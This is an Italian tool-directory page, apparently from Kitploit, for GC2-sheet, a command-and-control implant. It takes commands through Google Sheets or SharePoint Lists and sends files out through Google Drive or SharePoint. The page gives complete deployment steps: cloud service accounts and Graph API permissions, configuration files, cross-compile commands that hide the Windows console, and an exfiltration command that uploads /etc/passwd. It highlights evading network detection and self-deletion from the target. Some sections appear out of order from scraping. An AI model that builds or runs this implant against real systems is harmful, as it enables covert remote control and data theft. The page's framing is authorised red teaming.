Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
GC2-sheet — GC2 è un'applicazione di Command and Control che consente a un attaccante di eseguire comandi sulla macchina target utilizzando Google Sheet o Microsoft SharePoint List e di esfiltrare file utilizzando Google Drive o Microsoft SharePoint Document. | Kitploit
Strumenti/GitHubGitHub/loociprian/gc2-sheet
Esfiltrazione DatiAnalisi MalwareCommand and ControlRed TeamingStrumento di Accesso Remoto
GitHubloociprian/gc2-sheet

GC2-sheet

GC2 è un'applicazione di Command and Control che consente a un attaccante di eseguire comandi sulla macchina target utilizzando Google Sheet o Microsoft SharePoint List e di esfiltrare file utilizzando Google Drive o Microsoft SharePoint Document.

Vedi Repository
649121322 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

GC2

Logo

GC2 (Google Command and Control) è un'applicazione di Command and Control che consente a un attaccante di eseguire comandi sul computer bersaglio utilizzando Google Sheet o Microsoft SharePoint List e di esfiltrare file tramite Google Drive o Microsoft SharePoint Document.

Perché

Questo progetto è stato sviluppato per fornire un command and control che non richiede alcuna particolare configurazione (come: un dominio personalizzato, VPS, CDN, ...) durante le attività di Red Teaming.

Inoltre, il programma interagirà solo con i domini di Google e Microsoft (come *.google.com) per rendere più difficile il rilevamento di rete.

Flusso di lavoro

Google

Flusso di lavoro

Microsoft

Flusso di lavoro

Caratteristiche

  • Esecuzione di comandi utilizzando Google Sheet o Microsoft SharePoint List come console
  • Download di file sul bersaglio utilizzando Google Drive o Microsoft SharePoint Document
  • Esfiltrazione di dati utilizzando Google Drive o Microsoft SharePoint Document
  • Interruttore di auto-uccisione e auto-eliminazione dal computer bersaglio

Esecuzione di comandi

Google

Un Google Sheet verrà creato automaticamente dal C2. Una volta creato, puoi interagire con il sistema compromesso come mostrato di seguito.

Permessi del Foglio

Microsoft

Un Microsoft SharePoint List verrà creato automaticamente dal C2. Una volta creato, puoi interagire con il sistema compromesso come mostrato di seguito.

Permessi del Foglio

File di esfiltrazione dati

Un comando speciale è riservato per esfiltrare file dal sistema bersaglio.

root@kitploit:~
Dal Bersaglio a Google Drive/Microsoft SharePoint Document
upload;<percorso_locale>
Esempio:
upload;/etc/passwd

Nota: i file con lo stesso nome vengono automaticamente sovrascritti.

Download di file

Un comando speciale è riservato per scaricare file sul sistema bersaglio.

Google

root@kitploit:~
Da Google Drive al Bersaglio
download;<id_file_google_drive>;<percorso_locale>
Esempio:
download;<ID file>;/home/user/downloaded.txt

Microsoft

Nota: i file devono essere salvati nella cartella principale di SharePoint, di solito "Documents"

root@kitploit:~
Da SharePoint al Bersaglio
download;<percorso_file_SharePoint>;<percorso_locale>
Esempio:
download;download.txt;/home/user/downloaded.txt

Uscita

Inviando il comando exit, il C2 si ucciderà e si cancellerà dal sistema bersaglio.

PS: Dalla documentazione di os: Se un collegamento simbolico è stato usato per avviare il processo, a seconda del sistema operativo, il risultato potrebbe essere il collegamento simbolico o il percorso a cui puntava. In questo caso, il collegamento simbolico viene cancellato.

Configurazione

Questo C2 supporta sia i servizi Google (Google Sheet + Google Drive) che Microsoft (SharePoint Lists + SharePoint Document). Per usare il C2 devi configurare sia la configurazione locale che quella cloud.

Configurazione cloud

Google

  1. Crea un nuovo "account di servizio" Google

    Crea un nuovo "account di servizio" Google utilizzando https://console.cloud.google.com/, crea un file di chiave .json per l'account di servizio.

  2. Abilita Google Sheet API e Google Drive API

    Abilita Google Drive API https://developers.google.com/drive/api/v3/enable-drive-api e Google Sheet API https://developers.google.com/sheets/api/quickstart/go.

  3. Configura Google Sheet e Google Drive

    Crea un nuovo Google Sheet e condividilo (come Editor) con l'Account di Servizio (utilizzando la sua email).

    Permessi del Foglio

    Crea una nuova cartella Google Drive e condividila (come Editor) con l'Account di Servizio (utilizzando la sua email).

    Permessi del Foglio

Microsoft

Per interagire con i servizi Microsoft dovrai prima avere un abbonamento Business (puoi ottenerne uno gratuito per i primi 30 giorni).

  1. Crea un'Applicazione Azure

    Crea una nuova Applicazione Azure come descritto qui https://learn.microsoft.com/it-it/graph/auth-v2-service?tabs=http

    Permessi del Foglio

    Dopo aver creato la nuova applicazione, abilita le seguenti Graph API:

    • Sites.ReadWrite.All
    • Files.ReadWrite.All

    Permessi del Foglio

Configurazione locale

  1. Scarica il C2

    Il C2 può essere clonato direttamente da GitHub:

    root@kitploit:~
    git clone https://github.com/looCiprian/GC2-sheet
    cd GC2-sheet
    
  2. Configura il C2

    Per configurare il C2 devi modificare il file cmd/options.yml. Il C2 supporta sia i servizi Google che Microsoft; è possibile anche mescolarli.

    Solo servizi Google

    root@kitploit:~
    CommandService: "Google" # Google Sheet verrà usato come servizio di comando per prelevare comandi e inviare output
    FileSystemService: "Google" # Google Drive verrà usato come filesystem per scaricare ed esfiltrare file
    GoogleServiceAccountKey : "1234567890" # il tuo file json escapeato
    GoogleSheetID: "0987654321" # il tuo Google Sheet ID (lo trovi nell'URL)
    GoogleDriveID: "1234554321" # il tuo ID cartella Google Drive (lo trovi nell'URL)
    #RowId: 1 # opzionale, specifica da quale riga (Google Sheet o SharePoint List) il beacon deve prelevare nuovi comandi
    #Proxy: "http://127.0.0.1:8080" # opzionale, specifica il proxy
    Verbose: true # opzionale, consigliato per debug
    

    La chiave dell'account di servizio Google deve essere escapeata prima di incollarla nel file di configurazione. Puoi usare il seguente comando per escapearla:

    root@kitploit:~
    cat key.json | jq -r @json | sed 's/\\n/\\\\n/g' | sed 's/\"/\\"/g'
    

    Solo servizi Microsoft

    root@kitploit:~
    CommandService: "Microsoft" # Microsoft SharePoint List verrà usato come servizio di comando per prelevare comandi e inviare output
    FileSystemService: "Microsoft" # Microsoft SharePoint Document verrà usato come filesystem per scaricare ed esfiltrare file
    MicrosoftTenantID: "567890098765" # il tuo Azure Tenant ID dove è stata creata l'Applicazione Azure
    MicrosoftClientID: "098765567890" # il tuo ID Applicazione Azure
    MicrosoftClientSecret: "1234509876" # il tuo valore Secret dell'Applicazione Azure
    MicrosoftSiteID: "0987612345" # # il tuo ID SharePoint
    #RowId: 1 # opzionale, specifica da quale riga (Google Sheet o SharePoint List) il beacon deve prelevare nuovi comandi
    #Proxy: "http://127.0.0.1:8080" # opzionale, specifica il proxy
    Verbose: true # opzionale, consigliato per debug
    

Risoluzione dei problemi

La maggior parte degli errori può essere rilevata impostando il flag verbose su true. Per impostazione predefinita, il C2 non genera alcun output o informazione di errore.

Diapositive DEF CON + demo

Diapositiva DEF CON

Demo

Demo di Grant Collins

Disclaimer

Il proprietario di questo progetto non è responsabile per qualsiasi uso illegale di questo programma.

Questo è un progetto open source pensato per essere utilizzato con autorizzazione per valutare la postura di sicurezza e per scopi di ricerca.

L'utente finale è l'unico responsabile per le proprie azioni e decisioni. L'uso di questo progetto è a proprio rischio. Il proprietario di questo progetto non accetta alcuna responsabilità per qualsiasi perdita o danno causato dall'uso di questo progetto.

Supporta il progetto

Pull request o paypal

Collaboratori

Paolo Conizzoli

Articoli correlati a questo strumento

DEF CON 32; DEF CON 32 Reddit

Google

The Hacker News

Reddit

LinkedIn

Bleeping Computer

Security Affairs

Icrewplay

Information Security Buzz

Hackdig

Hakin9

RedPacketSecurity

Cyware

Kitploit

Notizie che menzionano malware che utilizzano lo stesso concetto:

The Hacker News - Voldemort Bleeping Computer - Voldemort

Scarica lo strumento

Mescolando servizi Google e Microsoft

root@kitploit:~
CommandService: "Google" # Google Sheet verrà usato come servizio di comando per prelevare comandi e inviare output
FileSystemService: "Microsoft" # Microsoft SharePoint Document verrà usato come filesystem per scaricare ed esfiltrare file
GoogleServiceAccountKey : "1234567890" # il tuo file json escapeato
GoogleSheetID: "0987654321" # il tuo Google Sheet ID (lo trovi nell'URL)
GoogleDriveID: "1234554321" # il tuo ID cartella Google Drive (lo trovi nell'URL)
MicrosoftTenantID: "567890098765" # il tuo Azure Tenant ID dove è stata creata l'Applicazione Azure
MicrosoftClientID: "098765567890" # il tuo ID Applicazione Azure
MicrosoftClientSecret: "1234509876" # il tuo valore Secret dell'Applicazione Azure
MicrosoftSiteID: "0987612345" # # il tuo ID SharePoint
#RowId: 1 # opzionale, specifica da quale riga (Google Sheet o SharePoint List) il beacon deve prelevare nuovi comandi
#Proxy: "http://127.0.0.1:8080" # opzionale, specifica il proxy
Verbose: true # opzionale, consigliato per debug
  • Compila l'eseguibile

    Alcuni esempi su come cross-compilare il C2 per diversi sistemi operativi e architetture.

    root@kitploit:~
    env GOOS=windows GOARCH=amd64 go build -ldflags "-s -w -H windowsgui"
    env GOOS=linux GOARCH=amd64 go build -ldflags "-s –w"
    env GOOS=darwin GOARCH=amd64 go build -ldflags "-s –w"
    
  • Esegui

    Dopo la compilazione, eseguilo.

    root@kitploit:~
    ./gc2-sheet
    

    Il beacon creerà automaticamente un nuovo Google Sheet o Microsoft SharePoint List in base alla tua configurazione.